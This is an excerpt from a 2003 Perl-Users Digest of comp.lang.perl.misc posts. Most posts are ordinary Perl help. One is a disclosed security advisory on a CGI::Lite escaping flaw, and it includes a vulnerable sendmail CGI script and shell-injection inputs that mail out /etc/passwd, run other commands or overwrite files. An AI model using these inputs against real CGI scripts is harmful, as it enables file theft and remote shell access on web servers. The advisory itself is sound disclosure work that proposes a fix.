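    return defined $global ? $global : 'undef';
}

print "before assignment: $early\n";
print "after assignment:  $late\n";
```

The first call sees an undefined $global and the second sees 3, although
both calls run the same compiled sub body.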

-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: Tue, 11 Feb 2003 18:44:51 -0000
From: rfg@monkeys.com (Ronald F. Guilmette)
Subject: Security bug in CGI::Lite::escape_dangerous_chars() function
Message-Id: <v4ih53t0l1ng7b@corp.supernews.com>

CC: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org

============================================================================
SUBJECT
	Security bug in CGI::Lite::escape_dangerous_chars() function, part
	of the CGI::Lite 2.0 package, and earlier revisions thereof.

SUMMARY
	The CGI::Lite::escape_dangerous_chars() function fails to escape
	the entire set of special characters that may have significance
	to the underlying shell command processor.  When the function is
	used from within a web CGI script which processes arbitrary user
	input from some HTML form, an attacker may be able to read and/or
	write some or all local files and may be able to obtain shell-
	level access to the attacked web server.

SCOPE
	Any and all UNIX and/or Linux systems which incorporate the Perl
	CGI::Lite module, or onto which this module has been installed.

	It appears likely that any/all MS Windows systems onto which the
	Perl CGI::Lite module has been installed may also be affected,
	however the author of this advisory HAS NOT verified that.

IMPACT
	If the CGI::Lite::escape_dangerous_chars() function is used within
	(for example) a web CGI script, a remote attacker may be able to
	read and/or write local files on the attacked web server and/or
	may be able to gain shell-level access to the attacked web server,
	via the CGI script, as the user-id under which the CGI script is
	executed (typically, but not always the `nobody' user).

	The potential exists for remote root compromise (or other privileged
	access) if a CGI script using CGI::Lite::escape_dangerous_chars() is
	installed as set-uid (root) or set-gid.

DISCUSSION
	Although poorly documented, the CGI::Lite::escape_dangerous_chars()
	function appears to be a function whose purpose is to modify an
	input character string in a way so that ``dangerous'' characters
	which might otherwise have special significance to an underlying
	shell command processor will each be preceded by a backslash
	(escape) character in the resulting output string.  The intent is
	clearly to convert possibly dangerous user input strings into
	benign forms that, when provided as command line arguments to an
	underlying shell command processor, will not have any undesirable
	and/or unanticipated effects.  (The classical example is the semi-
	colon character, which acts as a command separator for most UNIX
	and/or Linux shell command processors.)

	It is reasonable to believe that CGI::Lite::escape_dangerous_chars()
	has, in all probability, been used for exactly this purpose (i.e.
	rendering user input strings ``harmless'' in advance of their being
	provided, as arguments, to an underlying shell processor) in many
	existing Perl CGI scripts.

	Unfortunately, CGI::Lite::escape_dangerous_chars() fails to escape
	many of the characters mentioned as possibly dangerous characters
	in the WWW security FAQ (Question 7), specifically:

		\  -  backslash
		?  -  question mark
		~  -  tilde
		^  -  caret
		\n -  newline
		\r -  carriage return

	Note that all or most of these characters _do_ in fact have special
	meaning, when presented as parts of command line arguments to
	various UNIX and/or Linux shell command processors (and, I suspect,
	probably MS Windows shell command line processors also).

	Below is a trivially simple example of how this security flaw can
	cause a problem, in practice:

	=====================================================================
	#!/usr/bin/perl -w

	use strict;
	use CGI::Lite;

	my $cgi = new CGI::Lite;
	my %form = $cgi->parse_form_data;
	my $recipient = $form{'recipient'};

	my $message = "From: sender\nSubject: Hello\n\nHello my friend!\n\n";

	$recipient = escape_dangerous_chars ($recipient);

	open (SM, "|/usr/sbin/sendmail -f rfg $recipient");
	print SM $message;
	close SM;

	print "Content-Type: text/html\n\n";
	print "<HTML>\n";
	print "<HEAD></HEAD>\n";
	print "<BODY>\n";
	print "Thank you.  Your request has been processed\n";
	print "</BODY>\n";
	print "</HTML>\n";
	=====================================================================

	The Perl CGI script above might be constructed to act as the back-end
	(CGI) handler for a simple web page that allows a web visitor to enter
	his/her e-mail address into a text field on the form, and thereby
	trigger the automated sending of some pre-canned (or dynamically
	computed) e-mail message to the user-supplied e-mail address.
	
	Note that the escape_dangerous_chars function is used to ``sanitize''
	the user-supplied input string before it is used as an argument to
	the Perl open function.

	Unfortunately, the fact that escape_dangerous_chars fails to properly
	backslash-escape any backslash characters contained in its input string
	has very serious security consequences for the simple CGI script shown
	above.  Consider what would happen if a web visitor entered the string:

	attacker@example.com \</etc/passwd
	
	Note that after escape_dangerous_chars is applied to this user input,
	the resulting string will be
	
	attacker@example.com \\</etc/passwd
	
	and that exact string will be passed to the underlying shell command
	processor via the Perl open call.
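
	The transformation described above can be reproduced with a small
	sketch.  The flawed_escape function below is a hypothetical stand-in
	written for this illustration (it is NOT the actual CGI::Lite
	source); it is only assumed to behave as described here, escaping a
	set of shell metacharacters but not the backslash itself.

```perl
#!/usr/bin/perl -w
use strict;

# Hypothetical stand-in for illustration only; NOT the CGI::Lite source.
# It backslash-escapes several shell metacharacters, but (like the
# function discussed in this advisory) leaves backslashes untouched.
sub flawed_escape {
    my ($text) = @_;
    $text =~ s/([;<>*|&\$!#()\[\]{}'"`])/\\$1/g;
    return $text;
}

# The attacker's input: a backslash placed directly before the '<'.
my $input = 'attacker@example.com \\</etc/passwd';

# prints: attacker@example.com \\</etc/passwd
print flawed_escape($input), "\n";
```

	The '<' does get a backslash of its own, but that backslash pairs
	up with the one supplied by the attacker, leaving the '<' live.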

	The unfortunate result of this sequence of events would be that a
	copy of the local password file would be e-mailed, both to
	<attacker@example.com> and also to the (almost certainly non-existent)
	local user whose user-id is a single backslash character.  (Most
	UNIX/Linux shells will see the \\ as a single backslash-escaped
	backslash character.  That single backslash character will then
	be treated as being just another member of the list of destination
	e-mail addresses for the outgoing e-mail message by sendmail.)
	
	In this example, the account, if any, to which e-mail addressed to the
	(non-existent?) local user-id '\' is directed will vary, depending
	upon whether one is using ``real'' Sendmail or, as I do, a mostly
	compatible Sendmail clone (Postfix).  It may also depend, of course,
	on how exactly the local mail server has been configured.  E-mail
	sent to the local user '\' may in some cases be automatically re-
	directed to the `nobody' account, which is to say to /dev/null, in
	which case no local user or administrator would have any idea that
	anything untoward or undesirable had even taken place.

	Regardless of where the _second_ copy of the e-mail message goes,
	however, the damage has already been done... <attacker@example.com>
	_will_ be e-mailed a copy of the local password file... or any other
	attacker-selected file residing on the exploited system.
	
	Other similar (but perhaps even more damaging) kinds of exploits are
	also possible, for example:
	
	attacker@example.com\|other-command
	
	or perhaps:
	
	attacker@example.com\;other-command
	
	where `other-command' is `xterm' followed by a set of arguments needed
	to start up a remotely-accessible xterm window.  Also, depending on
	permissions, local files on the exploited machine could be created or
	overwritten, e.g. via:
	
	attacker@example.com\>/tmp/new-file
	attacker@example.com\>/tmp/unprotected-file
	
CONCLUSION
	It is clear that CGI::Lite::escape_dangerous_chars fails to properly
	backslash-escape backslash characters themselves, and other characters
	that may have special significance to the underlying shell command
	processor, when such characters are present in the input string.

	It is also clear that this failure can lead, and probably already
	has led, in many cases, to trivially-exploitable CGI scripts via
	which remote attackers can read files, write files, create files,
	and probably even obtain remote shell access on the exploited
	target system(s).
	
	Note that even if a CGI script using escape_dangerous_chars goes
	to the additional trouble of deleting all whitespace characters from
	user-supplied HTML form text field values (e.g. via s/\s//g) in ad-
	dition to applying escape_dangerous_chars to sanitize the input, the
	elimination of whitespace characters is quite definitely NOT sufficient
	to prevent all possible exploits, as illustrated in the examples above.

FIX
	One possible fix for this problem is simple and obvious.  The
	escape_dangerous_chars function could be hacked to include, in the
	set of characters that it will escape, the backslash character and
	other special characters from the complete set of ``dangerous''
	characters as documented in the WWW Security FAQ.  (A patch which
	effects this change is available from the author of this advisory
	upon request.)

	The advisability of this specific ``quick and dirty'' fix has been
	questioned by multiple parties, however.  (Some say that it would
	be better to list the set of characters which are safe to NOT
	escape, and then just have the function escape every character
	that is NOT in that ``safe'' character set.)
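
	The ``safe set'' approach might be sketched as follows.  The name
	escape_unsafe_chars and the particular choice of safe characters
	are assumptions made for this illustration; neither comes from
	CGI::Lite or from the patch mentioned above.

```perl
#!/usr/bin/perl -w
use strict;

# Hypothetical helper (not part of CGI::Lite): backslash-escape every
# character that is NOT in a small, explicitly listed "safe" set.
# The safe set here (letters, digits, '_', '.', '@', '-') is an
# assumption chosen for e-mail-like input.
sub escape_unsafe_chars {
    my ($text) = @_;
    $text =~ s/([^A-Za-z0-9_.\@-])/\\$1/g;
    return $text;
}

my $input = 'attacker@example.com \\</etc/passwd';

# prints: attacker@example.com\ \\\<\/etc\/passwd
print escape_unsafe_chars($input), "\n";
```

	Because the backslash is not in the safe set, it is escaped along
	with everything else.  One caveat: the shell treats a backslash
	followed by a newline as a line continuation, so a caller may
	prefer to reject input containing newlines outright.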

ADVISORY AUTHOR
	Ronald F. Guilmette <rfg@monkeys.com>

ADVISORY DATE
	February 11, 2003

DISCLOSURE HISTORY
	Multiple attempts were made to advise both the current maintainer of
	the CGI::Lite module (b.d.low@ieee.org) and also the administrator
	of the CPAN Perl archive web site (cpan@perl.org) beginning on
	January 10th, 2003, regarding this security bug/issue.  To date,
	no response of any kind has been received from either party.

	CERT (cert.org) was advised of the details of this security issue
	on January 22nd, 2003, and responded that they would notify and
	canvass their affiliated software vendors on this issue.  As of
	this writing, CERT has not provided any indication that any of
	their affiliated software vendors are affected by this issue.

	<security@redhat.com> was also notified on January 22nd, 2003.
	A representative of RedHat responded that RedHat is not affected
	by this security issue, but promised to notify other relevant
	software vendors of this issue.


------------------------------

Date: 11 Feb 2003 09:49:33 -0800
From: william_english@mentor.com (William English)
Subject: Re: Storing `ls -R` into an array
Message-Id: <7a735a20.0302110949.5945cc1b@posting.google.com>

"Jürgen Exner" <jurgenex@hotmail.com> wrote in message news:<a6_1a.19148$9y2.10282@nwrddc01.gnilink.net>...
> William English wrote:
> > I am doing this:
> >
> > @dirContents = `ls -R`;
> 
> And why on earth are you writing non-portable code that forks an external
> process instead of using Perl's built-in functions 'glob' or 'readdir' or
> even 'File::Find'?
> 
> Jue

This is a one-time use script. I need to write out to a file every
directory and file in a tree and do a comparison with another tree.
There is an nt tree and a unix tree. I need to determine if the file
or directory is <all> <nt> <unix> <ss6> or <hpx> and print those tags
before and after each element accordingly.

I am new to perl and didn't know any other way to do it. I'll look
into glob, readdir, and File::Find. Thanks
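
For reference, a rough File::Find equivalent of the `ls -R` call might
look like the sketch below. The list_tree name is made up for this
example, and starting from '.' is just an assumption about where the
tree lives.

```perl
#!/usr/bin/perl -w
use strict;
use File::Find;

# Hypothetical helper: return every file and directory under $root,
# including $root itself, as a sorted list of paths.
sub list_tree {
    my ($root) = @_;
    my @entries;
    # With no_chdir set, $File::Find::name holds the path relative to
    # $root and find() does not change the working directory.
    find({ wanted => sub { push @entries, $File::Find::name },
           no_chdir => 1 }, $root);
    my @sorted = sort @entries;
    return @sorted;
}

my @dirContents = list_tree('.');
print "$_\n" for @dirContents;
```

Unlike the backtick version, the entries come back without trailing
newlines and no external process is started.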

William


------------------------------

Date: 11 Feb 2003 10:54:14 -0800
From: squillion@hotmail.com (squillion)
Subject: trailing conditional - apparently inconsistent syntax rules
Message-Id: <81016f2d.0302111054.8ef04fe@posting.google.com>

why can i say

  print "x" if $x;

but not

  if $x print "x";

why only in the latter case am i forced to enclose the conditional in
()s and the block in {}s like so:

  if ($x) {print "x"}

i demand a refund.


------------------------------

Date: 11 Feb 2003 11:23:57 -0500
From: jester@panix.com (Jesse Sheidlower)
Subject: XML parsing and array-context problem
Message-Id: <b2b82t$kkp$1@panix2.panix.com>

I'm having problems with some XML parsing. I've been
using the XML::LibXML module, which has proved easy
to use and rather fast (speed is extremely important
for this application; parsing the full range of
material here will take hours, and every little bit
helps), but I'm in a place where, even though something
works, I can't figure out how to do it in what should
be a better way.

I'm in an XML document that, at this node, looks like this:

<q id="1234"><foo>random stuff</foo>
  <qt>Stuff I <emph>want</emph> to get.</qt>
</q>

I know that there is always one and exactly one <qt> in a <q>.

The situation I'm in now is that I have a $q_node pointing
to the <q>; I want to get the <qt> thereunder and call
"toString" on it to get the actual XML of the <qt> (i.e. I'd
like to keep the <emph> or other tags, without bothering to
parse further down).

Here is code that _works_:

 foreach my $qt_node ($q_node->findnodes("qt")) {
	my $realquote = $qt_node->toString();
	print "RealQuote is: $realquote\n";
      }

However, since I know that there's exactly one <qt> here, I
don't want to have to have the loop just to get the one value,
but I don't know how to get rid of it.

The docs for the findnodes method say:

	 findnodes performs the xpath statement on the current
         node and returns the result as an array. In scalar
         context returns a XML::LibXML::NodeList object.

If findnodes really does return an array in list context,
I thought I should be able to do something like

 my $qt_node = ($q_node->findnodes("qt"))[0];

but this gives a syntax error. Other solutions also fail; for example

  my @qt_node = $q_node->findnodes("qt");
  my $realquote = $qt_node[0]->toString(); 

returns nothing, so I get a "Can't call toString on undefined value" error.

I have similar problems in other parts of the program where I also
know I'm going to get a single node, but need the foreach to get it
out.

Thanks for any suggestions.

Jesse Sheidlower


------------------------------

Date: Tue, 11 Feb 2003 12:56:43 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: XML parsing and array-context problem
Message-Id: <3E49395B.5DE82FE0@earthlink.net>

Jesse Sheidlower wrote:
> 
> I'm having problems with some XML parsing. I've been
> using the XML::LibXML module, which has proved easy
> to use and rather fast (speed is extremely important
> for this application; parsing the full range of
> material here will take hours, and every little bit
> helps), but I'm in a place where, even though something
> works, I can't figure out how to do it in what should
> be a better way.
> 
> I'm in an XML document that, at this node, looks like this:
> 
> <q id="1234"><foo>random stuff</foo>
>   <qt>Stuff I <emph>want</emph> to get.</qt>
> </q>
> 
> I know that there is always one and exactly one <qt> in a <q>.
> 
> The situation I'm in now is that I have a $q_node pointing
> to the <q>; I want to get the <qt> thereunder and call
> "toString" on it to get the actual XML of the <qt> (i.e. I'd
> like to keep the <emph> or other tags, without bothering to
> parse further down).
> 
> Here is code that _works_:
> 
>  foreach my $qt_node ($q_node->findnodes("qt")) {
>         my $realquote = $qt_node->toString();
>         print "RealQuote is: $realquote\n";
>       }
> 
> However, since I know that there's exactly one <qt> here, I
> don't want to have to have the loop just to get the one value,
> but I don't know how to get rid of it.
> 
> The docs for the findnodes method say:
> 
>          findnodes performs the xpath statement on the current
>          node and returns the result as an array. In scalar
>          context returns a XML::LibXML::NodeList object.
> 
> If findnodes really does return an array in list context,
> I thought I should be able to do something like
> 
>  my $qt_node = ($q_node->findnodes("qt"))[0];
> 
> but this gives a syntax error.

A *syntax* error?  It looks like perfectly valid perl code to me.

Are you *sure* about that?  Could you copy&paste the code and the error?

> Other solutions also fail; for example
> 
>   my @qt_node = $q_node->findnodes("qt");
>   my $realquote = $qt_node[0]->toString();
> 
> returns nothing, so I get a "Can't call toString on undefined value"
> error.

How about:

   my ($qt_node) = $q_node->findnodes("qt");
   my $realquote = $qt_node->toString;

or:

   my ($realquote) = map $_->toString, $q_node->findnodes("qt");
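
The difference between these forms comes down to context, which can be
seen without XML::LibXML at all. In the sketch below, find_things is a
made-up stand-in for findnodes: it returns a list in list context and,
purely as an assumption for the demo, a count in scalar context (the
real method returns a NodeList object there, as the docs say).

```perl
#!/usr/bin/perl -w
use strict;

# Hypothetical stand-in for findnodes; not the XML::LibXML method.
sub find_things {
    my @found = ('<qt>first</qt>', '<qt>second</qt>');
    return wantarray ? @found : scalar @found;
}

my ($first) = find_things();       # list assignment: takes element 0
my $sliced  = (find_things())[0];  # list slice: also element 0
my $count   = find_things();       # scalar context: something else entirely

print "first:  $first\n";
print "sliced: $sliced\n";
print "count:  $count\n";
```

The parentheses around the variable on the left-hand side are what
put the call into list context.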

> I have similar problems in other parts of the program where I also
> know I'm going to get a single node, but need the foreach to get it
> out.

Could you post a minimal, but complete, perl program which demonstrates
your problem?  Include a little bit of data using the __DATA__ token and
the DATA filehandle.

-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: 11 Feb 2003 13:37:10 -0500
From: jester@panix.com (Jesse Sheidlower)
Subject: Re: XML parsing and array-context problem
Message-Id: <b2bfsm$eu5$1@panix2.panix.com>

In article <3E49395B.5DE82FE0@earthlink.net>,
Benjamin Goldberg  <goldbb2@earthlink.net> wrote:
>Jesse Sheidlower wrote:
>> 
>> If findnodes really does return an array in list context,
>> I thought I should be able to do something like
>> 
>>  my $qt_node = ($q_node->findnodes("qt"))[0];
>> 
>>  but this gives a syntax error.
>
>A *syntax* error?  It looks like perfectly valid perl code to me.
>
>Are you *sure* about that?  Could you copy&paste the code and the error?

I thought I had gotten a syntax error before, but that must have been
for other variants. This time through, it returned nothing which
then caused the toString method to die.

[...]

>> I have similar problems in other parts of the program where I also
>> know I'm going to get a single node, but need the foreach to get it
>> out.
>
>Could you post a minimal, but complete, perl program which demonstrates
>your problem?  Include a little bit of data using the __DATA__ token and
>the DATA filehandle.

Aach, that helped solve it! My minimal test program worked fine, and I
worked through it and realized that the problem was one level up;
the part that grabbed the $q_node was also getting things at the same
level that were not <q>'s. When I fixed the XPath request to ensure I 
only got <q>'s everything got better.

However, there's still an unexpected timing issue. The version with
the foreach is actually slightly _faster_. On a run of some sample
data, about 5M with a total of about 19,000 <q> sections, doing

      foreach my $qt_node ($q_node->findnodes("qt")) {
        my $realquote = $qt_node->toString();
	print "RealQuote is: $realquote\n";
      }

took 1m23.2s, but doing

     my $qt_node = ($q_node->findnodes("qt"))[0];
     my $realquote = $qt_node->toString();
     print "RealQuote is: $realquote\n";

took 1m24.4s. (This is with a bunch of other parsing happening
as well.) Hmm.

Thank you for the guidance.

Jesse Sheidlower


------------------------------

Date: 11 Feb 2003 18:51:33 GMT
From: anno4000@lublin.zrz.tu-berlin.de (Anno Siegel)
Subject: Re: XML parsing and array-context problem
Message-Id: <b2bgnl$fmu$1@mamenchi.zrz.TU-Berlin.DE>

Jesse Sheidlower <jester@panix.com> wrote in comp.lang.perl.misc:

[snip]
 
> I'm in an XML document that, at this node, looks like this:
> 
> <q id="1234"><foo>random stuff</foo>
>   <qt>Stuff I <emph>want</emph> to get.</qt>
> </q>
> 
> I know that there is always one and exactly one <qt> in a <q>.
> 
> The situation I'm in now is that I have a $q_node pointing
> to the <q>; I want to get the <qt> thereunder and call
> "toString" on it to get the actual XML of the <qt> (i.e. I'd
> like to keep the <emph> or other tags, without bothering to
> parse further down).
> 
> Here is code that _works_:
> 
>  foreach my $qt_node ($q_node->findnodes("qt")) {
> 	my $realquote = $qt_node->toString();
> 	print "RealQuote is: $realquote\n";
>       }
> 
> However, since I know that there's exactly one <qt> here, I
> don't want to have to have the loop just to get the one value,
> but I don't know how to get rid of it.

Benjamin Goldberg has already given a good reply.  I'd just like to
add that there's absolutely nothing wrong with a one-shot loop like
yours (except for the placement of the final "}").  You'd have to do
something to isolate the single value, which the loop does nicely for
you.  The alternatives you and Benjamin are discussing show the fact
that only one value is expected more clearly, but from a coding point
of view the loop seems natural.

Anno


------------------------------

Date: Tue, 11 Feb 2003 14:14:08 -0500
From: Benjamin Goldberg <goldbb2@earthlink.net>
Subject: Re: XML parsing and array-context problem
Message-Id: <3E494B80.220C3F61@earthlink.net>

Jesse Sheidlower wrote:
[snip]
> However, there's still an unexpected timing issue. The version with
> the foreach is actually slightly _faster_. On a run of some sample
> data, about 5M with a total of about 19,000 <q> sections, doing
> 
>       foreach my $qt_node ($q_node->findnodes("qt")) {
>         my $realquote = $qt_node->toString();
>         print "RealQuote is: $realquote\n";
>       }
> 
> took 1m23.2s, but doing
> 
>      my $qt_node = ($q_node->findnodes("qt"))[0];
>      my $realquote = $qt_node->toString();
>      print "RealQuote is: $realquote\n";
> 
> took 1m24.4s. (This is with a bunch of other parsing happening
> as well.) Hmm.

Try this for speed:

  print "RealQuote is: ",
     ($q_node->findnodes("qt"))[0]->toString, "\n";

Also, perhaps more importantly, try profiling your code, and seeing what
parts of the code are slowing you down the most.  The difference between
your two versions of code is a mere one percent ... not a significant
difference, imho.
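
If you do want to compare just the two idioms in isolation, the core
Benchmark module is one way to do it. This is only a micro-benchmark
sketch, not a profile of your program, and find_things is a made-up
stand-in for the findnodes call, so the numbers say nothing about
XML::LibXML itself.

```perl
#!/usr/bin/perl -w
use strict;
use Benchmark qw(cmpthese);

# Hypothetical stand-in for $q_node->findnodes("qt"): a one-element list.
sub find_things { return ('<qt>Stuff</qt>') }

# Variant 1: one-shot foreach loop.
sub via_foreach {
    my $result;
    foreach my $item (find_things()) { $result = $item }
    return $result;
}

# Variant 2: list slice.
sub via_slice {
    my $item = (find_things())[0];
    return $item;
}

# Run each variant a fixed number of times and print a comparison table.
cmpthese(500_000, {
    'foreach' => \&via_foreach,
    'slice'   => \&via_slice,
});
```

The timings will vary from run to run and from machine to machine.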

-- 
"So, who beat the clueless idiot today?"
"Well, we flipped for it, but when Kuno
 landed, he wasn't in any shape to fight."
"Next time, try flipping a *coin.*"


------------------------------

Date: 6 Apr 2001 21:33:47 GMT (Last modified)
From: Perl-Users-Request@ruby.oce.orst.edu (Perl-Users-Digest Admin) 
Subject: Digest Administrivia (Last modified: 6 Apr 01)
Message-Id: <null>


Administrivia:

The Perl-Users Digest is a retransmission of the USENET newsgroup
comp.lang.perl.misc.  For subscription or unsubscription requests, send
the single line:

	subscribe perl-users
or:
	unsubscribe perl-users

to almanac@ruby.oce.orst.edu.  

To submit articles to comp.lang.perl.announce, send your article to
clpa@perl.com.

To request back copies (available for a week or so), send your request
to almanac@ruby.oce.orst.edu with the command "send perl-users x.y",
where x is the volume number and y is the issue number.

For other requests pertaining to the digest, send mail to
perl-users-request@ruby.oce.orst.edu. Do not waste your time or mine
sending perl questions to the -request address, I don't have time to
answer them even if I did know the answer.


------------------------------
End of Perl-Users Digest V10 Issue 4550
***************************************
